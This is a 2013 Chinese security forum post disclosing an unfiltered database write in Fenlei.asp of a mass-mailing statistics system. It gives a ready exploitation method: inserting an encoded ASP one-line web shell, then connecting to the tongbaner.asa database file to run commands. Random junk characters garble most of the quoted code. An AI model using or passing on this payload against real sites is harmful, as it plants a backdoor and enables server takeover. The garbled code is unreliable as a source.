找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2288|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp / X! P7 S2 M, [& o# ]& c! [, t
0 G& B8 d) f8 M: C* `+ F' V
IF Request.QueryString("Action")="del" Then # Z- g0 F' `' l
ID=Request.QueryString("ID")
! a$ ?) L( j7 x* \IF Countss ("tui","Fenlei",ID )<>0 then
6 e: E  f' [: N; b+ s'略
' }, F: ?1 j9 e( ^3 e: }3 d& CIF Request.QueryString("Action")="Add" Then
7 j. J) F, y/ X4 b& LTname=Request.Form("Typename") , _7 ~7 `- Q! \/ |' [8 I* B
Set Rs=Server.CreateObject("adodb.Recordset")
# |( b9 R0 `/ ?; F" c9 MSql="Select * From Fenlei Order by id Desc " - X& P; D. C# c; u
Rs.Open Sql,Conn,1,3 ) ~! {6 e1 ]1 d
Rs.Addnew
" x* f0 X6 T$ c! Q' v* W% Z% tRs("Typename")=Tname
( D7 i3 L' ]% Z' O'略
. {$ n+ x+ |0 N' p: G1 h# F1 {Set Rs=Server.CreateObject("adodb.Recordset")
2 b& @4 P5 S# d  d8 t, ASql="Select * From Fenlei Order by id Desc "
2 p( J( Y, t8 C. e2 ~& kRs.Open Sql,Conn,1,1 + V' g4 W1 h. X; c0 J% O7 V# Z
'略
# `9 u1 t/ l" C+ r%>7 \6 J$ q' e. b0 D

4 a! p1 N9 Y4 G; l ( i" U, S  a% p" Q
& J2 s" ~, Q: u: I
没有过滤,直接写入数据库。
% m1 z. J7 o! L, m- S: u % v! w2 G$ R' b0 y: `0 W# j) l
利用方法:
+ e3 |8 k& K) w. k7 K. Q9 n 9 X% C! f( z+ V
插入:┼攠數畣整爠煥敵瑳∨≡┩>
1 U  [5 |& J$ ]* l# ^' V  v ; z* S. Y& `) l. F' R5 w' t
. J) E7 \6 u, R
连接: http://www.xxx.com/###tongbaner.asa
& Y. \# e- y& i  K'默认安装文件:
- D9 V* x9 Q1 ]+ E'install.asp% j" C6 W& x  M& ^) ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表